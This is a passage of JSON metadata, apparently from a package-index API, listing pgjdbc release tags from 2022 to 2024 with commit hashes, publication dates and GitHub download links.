4-02-20T15:49:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3/manifests"},{"name":"REL42.7.2-rc2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:25:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2/manifests"},{"name":"REL42.7.2-rc1","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:10:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1/manifests"},{"name":"REL42.7.2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"commit","published_at":"2024-02-20T15:01:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2/manifests"},{"name":"REL42.7.1","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:32:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1/manifests"},{"name":"REL42.7.1-rc2","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:26:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2/manifests"},{"name":"REL42.7.1-rc1","sha":"bb577e0a7afb0df74a9a00d43896ada2c1dd0dfc","kind":"tag","published_at":"2023-12-06T15:08:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1/manifests"},{"name":"REL42.7.0","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T19:04:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0/manifests"},{"name":"REL42.7.0-rc3","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T18:11:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3/manifests"},{"name":"REL42.6.0","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:10:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0/manifests"},{"name":"REL42.6.0-rc1","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:07:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1/manifests"},{"name":"REL42.5.4","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:41:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4/manifests"},{"name":"REL42.5.4-rc1","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:26:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1/manifests"},{"name":"REL42.5.3","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:23:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3/manifests"},{"name":"REL42.5.3-rc2","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:19:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2/manifests"},{"name":"REL42.5.3-rc1","sha":"d2f77a26815e7994db7ac4d816d29d6d7395418d","kind":"tag","published_at":"2023-02-03T15:07:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1/manifests"},{"name":"REL42.5.2-rc2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"tag","published_at":"2023-02-01T13:20:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2/manifests"},{"name":"REL42.5.2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"commit","published_at":"2023-01-31T20:40:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2/manifests"},{"name":"REL42.5.2-rc1","sha":"e7239c1f8e1f8757fbe3b50ba4c967ea85cdf12e","kind":"tag","published_at":"2023-01-13T20:43:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1/manifests"},{"name":"REL42.5.1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:36:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1/manifests"},{"name":"REL42.5.1-rc1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:32:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1/manifests"},{"name":"REL42.4.3","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T14:02:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3/manifests"},{"name":"REL42.4.3-rc1","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T13:58:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1/manifests"},{"name":"REL42.3.8","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:47:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8/manifests"},{"name":"REL42.3.8-rc1","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:37:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1/manifests"},{"name":"REL42.2.27","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:33:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27/manifests"},{"name":"REL42.2.27-rc1","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:30:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1/manifests"},{"name":"REL42.3.7","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:53:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7/manifests"},{"name":"REL42.3.7-rc1","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:43:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1/manifests"},{"name":"REL42.5.0","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:25:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0/manifests"},{"name":"REL42.5.0-rc1","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:11:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1/manifests"},{"name":"REL42.4.2","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:39:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2/manifests"},{"name":"REL42.4.2-rc1","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:22:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1/manifests"},{"name":"REL42.2.26","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:21:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26/manifests"},{"name":"REL42.2.26-rc2","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:20:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2/manifests"},{"name":"REL42.2.26-rc1","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:16:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1/manifests"},{"name":"REL42.4.1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T13:14:28.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1/manifests"},{"name":"REL42.4.1-rc1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T12:58:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1/manifests"},{"name":"REL42.4.0","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T15:58:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0/manifests"},{"name":"REL42.4.0-rc1","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T14:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1/manifests"},{"name":"REL42.3.6","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:19:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6/manifests"},{"name":"REL42.3.6-rc1","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:11:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz